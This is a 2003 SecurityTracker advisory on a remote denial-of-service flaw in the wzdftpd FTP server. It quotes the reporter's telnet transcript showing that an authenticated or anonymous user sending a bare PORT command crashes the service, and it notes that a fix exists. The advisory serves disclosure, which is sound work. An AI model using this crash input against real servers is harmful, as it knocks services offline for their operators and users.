SecurityTracker.com
Keep Track of the Latest Vulnerabilities
with SecurityTracker!
    Home    |    View Topics    |    Search    |    Contact Us    |    Help    |   

SecurityTracker
Archives


Join our Affiliate Program
 
Click to Sign Up
Sign Up
Sign Up for Your FREE Weekly SecurityTracker E-mail Alert Summary
Instant Alerts
Buy our Premium Vulnerability Notification Service to receive customized, instant alerts
Affiliates
Put SecurityTracker Vulnerability Alerts on Your Web Site -- It's Free!
Partners
Become a Partner and License Our Database or Notification Service
Report a Bug
Report a vulnerability that you have found to SecurityTracker
bugs
@
securitytracker.com
Sign Up!





Category:  Application (File Transfer/Sharing)  >  wzdftpd Vendors:  Chifflier, Pierre
'wzdftpd' FTP Service Can Be Crashed By Remote Authenticated Users
SecurityTracker Alert ID:  1007076
CVE Reference:  GENERIC-MAP-NOMATCH   (Links to External Site)
Date:  Jun 27 2003
Impact:  Denial of service via network
Fix Available:  Yes   Exploit Included:  Yes   Vendor Confirmed:  Yes  
Version(s): 0.1rc4 and prior versions
Description:  A vulnerability was reported in wzdftpd. A remote authenticated user can cause the FTP service to crash.

It is reported that a remote authenticated user, including an anonymous user, can issue a PORT command without any arguments to cause the FTP service to crash.
Impact:  A remote authenticated user (including anonymous users, if anonymous FTP is enabled) can cause the FTP service to crash.
Solution:  The vendor has reportedly released a fix, available in the CVS version.
Vendor URL:  www.wzdftpd.net/ (Links to External Site)
Cause:  Boundary error
Underlying OS:  Linux (Any), UNIX (Any)
Reported By:  Roman Bogorodskiy <bogorodskiy@inbox.ru>
Message History:   None.

 Source Message Contents
Date:  Fri, 27 Jun 2003 21:16:17 +0400
From:  Roman Bogorodskiy <bogorodskiy@inbox.ru>
Subject:  wzdftpd remote DoS

 

Title: wzdftpd remote DoS
Affected: wzdftpd <= 0.1rc4
URL: http://www.wzdftpd.net
Risk: High
Exploitable: Yes
Remote: Yes
Date: June, 27 2003

Overview: 
"A portable, modular and efficient ftp server, supporting SSL,
winsock, multithreaded, modules ,externals scripts. unix-like
permissions+acls, virtual users/groups, security, speed, bandwith
limitation (user,group,global), group admins, per command auth"

Description:
wzdftpd crashes after sending command "PORT" w/out args. 

$> telnet 127.0.0.1 21
Trying 127.0.0.1...
Connected to localhost.novel.ru.
Escape character is '^]'.
220 wzd server ready.
USER guest
331 User guest okay, need password.
PASS any
230 User logged in, proceed.
PORT
Connection closed by foreign host.
$> telnet 127.0.0.1 21
Trying 127.0.0.1...
telnet: connect to address 127.0.0.1: Connection refused
telnet: Unable to connect to remote host

So, we see server is down.
Jun 11 23:00:33 fbd kernel: pid 7149 (lt-wzdftpd), uid 0: exited on signal 11 (core dumped)

This bug is fixed on June, 12 in a CVS version. 

-Roman Bogorodskiy [Novel]


Go to the Top of This SecurityTracker Archive Page



Home   |    View Topics   |    Search   |    Contact Us   |    Help

Copyright 2002, SecurityGlobal.net LLC